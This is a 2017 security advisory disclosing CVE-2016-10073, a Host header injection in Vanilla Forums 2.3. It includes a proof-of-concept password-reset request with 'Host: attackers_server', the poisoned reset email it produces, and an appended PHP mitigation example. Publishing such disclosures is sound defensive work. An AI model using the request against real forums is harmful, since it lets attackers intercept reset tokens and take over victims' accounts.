=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-10073
- Release date: 11.05.2017
- Revision 1.0
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------

Vanilla Forums <= 2.3  Host Header Injection  CVE-2016-10073 [0day]

II. BACKGROUND
-------------------------

"Community Forums Reinvented
Create an online community that your customers will love. Vanilla's forum
software is used by top brands to engage customers, drive loyalty and reduce
support costs."

"Vanilla provides cloud and open source community forum software that powers
discussion forums worldwide with close to 1M downloads. Built for flexibility
and integration, Vanilla is the best, most powerful community solution in the
world."

https://vanillaforums.com/en/software/
https://open.vanillaforums.com/

III. INTRODUCTION
-------------------------

Vanilla Forums software (including the latest stable version of 2.3 in its
default configuration) is affected by:

* Host Header Injection  CVE-2016-10073  (0day)

which can be exploited by unauthenticated remote attackers to potentially
intercept the password reset hash and gain unauthorized access to the victim's
account, or to perform web-cache poisoning attacks.

IV. DESCRIPTION
-------------------------

Vanilla Forums software, in its default configuration, makes use of the
user-supplied HTTP HOST header (CVE-2016-10073) when sending emails from the
host on which the forum was installed.

The HOST header is used to form the sender email address, as we can see in the
following snippet of code:

------[ library/core/class.email.php ]------

...
    public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) {
        if ($SenderEmail == '') {
            $SenderEmail = c('Garden.Email.SupportAddress', '');
            if (!$SenderEmail) {
                // Falls back to the client-controlled Host header when no
                // support address is configured.
                $SenderEmail = 'noreply@'.Gdn::request()->host();
            }
        }

        if ($SenderName == '') {
            $SenderName = c('Garden.Email.SupportName', c('Garden.Title', ''));
        }

        if ($this->PhpMailer->Sender == '' || $bOverrideSender) {
            $this->PhpMailer->Sender = $SenderEmail;
        }

        ob_start();
        $this->PhpMailer->setFrom($SenderEmail, $SenderName, false);
        ob_end_clean();
        return $this;
    }
...

-----------------------------------------

As we can see, by default Vanilla uses the 'noreply@HOST' address, where HOST
is obtained from the client's HTTP request.

V. PROOF OF CONCEPT
-------------------------

An attacker may use the HTTP HOST header to set the email domain to an
arbitrary host. For example, sending the following HTTP request:

------------
POST /vanilla2-3/entry/passwordrequest HTTP/1.1
Host: attackers_server
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 149

hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=victim&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON
------------

will result in the following email being sent to the victim:

------------
To: victim@victim-server.com
Subject: [Vanilla 2.3] Reset Your Password
X-PHP-Originating-Script: 0:class.phpmailer.php
Date: Thu, 11 May 2017 09:42:13 +0000
Return-Path: noreply@attackers_server
Message-ID: <a989e3868a609316dd9a7d7a991d79e5@attackers_server>
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

Vanilla 2.3 http://attackers_server/vanilla2-3/=0A=0A=0A=0AReset Your Passw=
ord=0A=0A=0A=0AWe've received a request to change your password at Vanilla =
2.3. If you didn't make this request, please ignore this email.=0A=0A=0A=0A=
Change My Password: http://attackers_server/vanilla2-3/entry/passwordreset/=
2/PdNvqaPnnFaG
------------

Because the HOST header was set to:

Host: attackers_server

the resulting email has the sender's address set to noreply@attackers_server.
The password reset link also contains the attacker's server, which could allow
the attacker to intercept the hash if the victim user clicked on the malicious
link.

VI. BUSINESS IMPACT
-------------------------

With victim user interaction, an attacker could potentially intercept the
password reset hash.

This vulnerability may also lead to web-cache poisoning if the HOST header is
used to form links in web responses. See references for more details on this
vector.

VII. SYSTEMS AFFECTED
-------------------------

The latest stable release of Vanilla Forums available at the official website:

https://open.vanillaforums.com/addon/vanilla-core-2.3

was confirmed to be vulnerable. Previous versions are also likely to be
vulnerable.

This vulnerability can also be combined with the CVE-2016-10033 vulnerability
to achieve Unauthenticated Remote Code Execution, as described in a separate
advisory.

VIII. SOLUTION
-------------------------

This vulnerability was reported to the Vanilla Forums support team in December
2016. Despite the acknowledgment of the issue by the team, it has remained
unpatched for over 5 months. As there has been no progress or further updates,
this advisory is finally released to the public without an official patch.

IX. REFERENCES
-------------------------

https://legalhackers.com
https://ExploitBox.io
https://twitter.com/Exploit_Box

Vendor site:
https://vanillaforums.com

Confirmed vulnerable stable version of Vanilla Forums 2.3:
https://open.vanillaforums.com/addon/vanilla-core-2.3
https://open.vanillaforums.com/discussion/32822/vanilla-2-3-is-now-available

Vanilla Forums RCE 0day exploit:
https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Web-cache poisoning:
http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

X. CREDITS
-------------------------

Discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
https://ExploitBox.io

XI. REVISION HISTORY
-------------------------

11.05.2017 - Advisory released, rev. 1

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
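As an added example that is not Vanilla's code and not part of this advisory, the following PHP shows the mitigation missing from the from() snippet in section IV: the sender address and the host in the password-reset link are derived from an administrator-configured allowlist with a canonical fallback, so the client-supplied HOST header never reaches outgoing mail. All function and variable names are hypothetical and the sample inputs are constructed to mirror the PoC above.

```php
<?php
// Added example (hypothetical names, not Vanilla's code): build the sender
// address and the password-reset link from a configured canonical host
// instead of the client-supplied HTTP Host header.

function canonical_host(string $requestHost, array $allowedHosts, string $fallback): string
{
    // Drop a trailing port and normalise case before comparing.
    $host = strtolower(preg_replace('/:\d+$/', '', trim($requestHost)));
    // Accept only syntactically valid hostnames (RFC 1123 labels, max 253 chars).
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    if (!preg_match("/^(?=.{1,253}$)(?:$label\\.)*$label$/", $host)) {
        return $fallback;
    }
    // Anything not explicitly allowed by the administrator is replaced.
    return in_array($host, $allowedHosts, true) ? $host : $fallback;
}

function sender_address(string $supportAddress, string $requestHost, array $allowedHosts, string $fallback): string
{
    // Prefer an explicitly configured support address (Garden.Email.SupportAddress
    // in Vanilla); otherwise use noreply@ on a validated host, never on the raw header.
    if ($supportAddress !== '' && filter_var($supportAddress, FILTER_VALIDATE_EMAIL) !== false) {
        return $supportAddress;
    }
    return 'noreply@' . canonical_host($requestHost, $allowedHosts, $fallback);
}

function reset_link(string $requestHost, array $allowedHosts, string $fallback, string $path): string
{
    // The host in the reset link is what the PoC poisons; validate it the same way.
    return 'https://' . canonical_host($requestHost, $allowedHosts, $fallback) . $path;
}

// Constructed inputs mirroring the advisory's PoC (attacker-controlled Host header).
$allowed  = ['forum.example.com'];
$fallback = 'forum.example.com';
$path     = '/vanilla2-3/entry/passwordreset/2/TOKEN_PLACEHOLDER';

foreach (['attackers_server', 'forum.example.com:443', 'FORUM.example.com'] as $hostHeader) {
    echo $hostHeader, ' -> ', sender_address('', $hostHeader, $allowed, $fallback),
         ' ; ', reset_link($hostHeader, $allowed, $fallback, $path), "\n";
}
// A configured support address wins regardless of the request host.
echo sender_address('support@example.com', 'attackers_server', $allowed, $fallback), "\n";
```

The unlisted host from the PoC collapses to the fallback in both the sender address and the link, while a listed host with a port or different case is accepted after normalisation.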